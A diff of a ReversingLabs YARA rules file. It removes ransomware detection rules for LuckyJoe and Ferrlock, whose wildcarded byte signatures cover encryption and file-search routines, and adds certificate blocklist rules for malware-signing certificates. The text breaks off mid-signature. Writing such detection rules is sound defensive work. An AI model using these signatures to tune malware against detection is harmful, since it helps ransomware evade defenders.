-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.LuckyJoe.yara#L1-L146"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11536-L11554"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1e7df2c45bee072af233cf8f355a84ec931fe96afa3fbdcd225dded1b75ea961"
+		logic_hash = "2a9f13f5e79a12f7e9d9d4a0dcaac065e1fc5167c67bc9f3fd7ba1c374b26d96"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "LuckyJoe"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$main_call_p1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48
-            C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 75 ?? 48
-            8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? BE ?? ??
-            ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? E8 ?? ??
-            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 35 ?? ?? ?? ?? 48 83 EC ?? 48 8B 45
-            ?? 6A ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7
-            E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ??
-            ?? ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48
-        }
-		$main_call_p2 = {
-            89 C7 E8 ?? ?? ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45
-            ?? 89 C2 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C2
-            48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 45 ?? 48
-            01 D0 C6 00 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 D0 C6 00 ?? 48 8B 45 ?? 48 8B 55 ?? 48
-            89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? BF ?? ?? ?? ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? B8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 ??
-            48 83 7D ?? ?? 74 ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8
-        }
-		$main_call_p3 = {
-            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ??
-            ?? ?? 48 C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45
-            ?? 48 83 7D ?? ?? 74 ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ??
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 48 98 48 8B 84
-            C5 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 98
-            48 8B 84 C5 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 74 ?? BF ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 D6 F3 48 A5 48 89 F2 48 89 F8 0F B7 0A 66 89
-            08 48 8D 40 ?? 48 8D 52 ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            48 C7 45 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7
-            F3 48 AB 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75
-            ?? 48 8B 85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7
-            E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48
-            01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ??
-            ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8B 45
-            ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48
-            89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 45 ?? 48
-        }
-		$encrypt_files_p2 = {
-            89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ??
-            ?? EB ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            89 45 ?? 48 83 7D ?? ?? 75 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
-            8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ?? ??
-            48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ??
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45
-            ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 89 C7 E8 ??
-            ?? ?? ?? 48 01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B
-            95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-            ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F
-            85 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
-        }
-		$encrypt_internal_message_p1 = {
-            55 48 89 E5 53 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? BF ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8B
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 83 C0 ?? 48 98 48 89 C7 E8 ?? ?? ??
-            ?? 48 89 45 ?? 8B 45 ?? 83 C0 ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ??
-            ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
-            8B 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? 83 E8 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 66 0F EF C0 F2 0F 2A 45 ??
-            66 0F EF C9 F2 0F 2A 4D ?? F2 0F 5E C1 E8 ?? ?? ?? ?? F2 0F 2C C0 89 45 ?? 8B 45 ??
-            0F AF 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 8B 45 ?? 0F AF 45 ?? 48 63 D0
-            48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 0F AF 45 ?? 89 C3 48 8B
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 8B 45 ?? 89 C1 89 DA BF ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 3B 45 ?? 7D ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 45
-            ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 89
-        }
-		$encrypt_internal_message_p2 = {
-            C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 45 ?? 48 8D
-            34 02 48 8B 4D ?? 48 8B 55 ?? 8B 45 ?? 41 B8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48
-            8B 05 ?? ?? ?? ?? 48 8B 55 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ??
-            48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8B 45 ?? 48 63 D0 8B 45 ?? 48 63 C8 48 8B 45 ?? 48 01 C1 48 8B 45 ?? 48 89 C6
-            48 89 CF E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 8B 45 ?? 01 45 ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 0F 8E ?? ?? ?? ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 4D ?? 48 8B 45 ?? BA ?? ??
-            ?? ?? 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C4 ?? 5B 5D
-            C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $main_call_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $encrypt_internal_message_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" or pe.signatures [ i ] . serial == "c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" ) and 1643500800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ferrlock : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ferrlock ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "745ce529-46d0-56ed-a8fa-b41b26b068f4"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "c6e93547-5be0-5303-b537-655db3d78ad4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ferrlock.yara#L1-L131"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11556-L11574"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b94bc77489dbb74573813631009e605bc848e17995a0a512d08b194ee3020b75"
+		logic_hash = "691b57929c93d14f8700e0e61170b9248499fd36b80aec90f2054c32d6a3a9eb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ferrlock"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
-            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
-            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
-            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
-            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
-            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
-            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
-        }
-		$search_files_p2 = {
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
-            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
-            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
-            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
-            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$enum_rsrc = {
-            6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 8D 4D ?? 83 4D ?? ?? 51 50 6A
-            ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? EB ?? 33 DB 39 5D ?? 7E ??
-            8D 7E ?? F7 47 ?? ?? ?? ?? ?? 74 ?? 8D 47 ?? 89 45 ?? 8B 45 ?? 8B 00 8B 48 ?? 85 C9
-            74 ?? 8B 01 8D 55 ?? 52 FF 50 ?? EB ?? FF 37 8D 4D ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D
-            45 ?? 50 8B 45 ?? 8B 48 ?? E8 ?? ?? ?? ?? 83 4D ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 43 83
-            C7 ?? 3B 5D ?? 7C ?? 83 4D ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C2 ?? ?? E8 ?? ?? ?? ?? CC 55 8B EC 6A ?? 68 ?? ?? ?? ??
-            64 A1 ?? ?? ?? ?? 50 56 A1 ?? ?? ?? ?? 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83
-            65 ?? ?? 8B 4E ?? 85 C9 74 ?? 8B 11 3B CE 0F 95 C0 0F B6 C0 50 FF 52 ?? 83 66 ?? ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C3
-        }
-		$create_test_file_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 33 DB 8D 55
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 59 8D 45 ?? C6 45 ?? ??
-            50 8D 4D ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 CB ?? 8B 3D ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 65 ?? ??
-            8D 4D ?? 83 65 ?? ?? 56 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? FF 75 ?? 8B 45 ?? 2B 45
-            ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 55 ?? 8D 4D ?? 0F 43 45 ??
-            83 7D ?? ?? 0F 43 4D ?? 3B 55 ?? 75 ?? 52 50 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ??
-            ?? ?? ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ??
-            ?? 8D 4D ?? 0F 85 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 0F 85 ?? ??
-            ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 43 45 ?? 33 C9 51 57
-        }
-		$create_test_file_p2 = {
-            6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 3B C3 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
-            7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
-            33 C9 51 57 6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 8B F8 3B FB 0F 84 ?? ?? ?? ?? 6A ??
-            57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 6A ?? 58 3B F0 0F 42 F0 03 F0 56 E8 ?? ?? ?? ?? 59 6A ?? 89 85
-            ?? ?? ?? ?? 8D 45 ?? 50 56 8B B5 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75
-            ?? 57 FF 15 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 55 ?? 50
-            8B CE E8 ?? ?? ?? ?? 59 59 33 DB 53 53 53 57 FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75
-            ?? 56 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43
-            4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C3 E8 ??
-            ?? ?? ?? C3
-        }
-		$encrypt_files_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 F6 8D 4D ?? 89 B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 75 ?? 8D 4D ?? 68 ?? ?? ?? ?? 89 75 ?? 89 75 ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 7D ?? 8B D8 8B 45
-            ?? 0F 43 7D ?? 59 3B D8 77 ?? 85 DB 74 ?? 2B C3 40 03 C7 89 85 ?? ?? ?? ?? 2B C7 50
-            6A ?? 57 EB ?? 53 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 85 ?? ??
-            ?? ?? 46 2B C6 50 6A ?? 56 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? EB ?? 2B F7 EB
-            ?? 83 CE ?? 83 FE ?? 74 ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 50 51 56 8D 4D
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-        }
-		$encrypt_files_p2 = {
-            50 E8 ?? ?? ?? ?? 6A ?? 5F 89 7D ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 51 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85
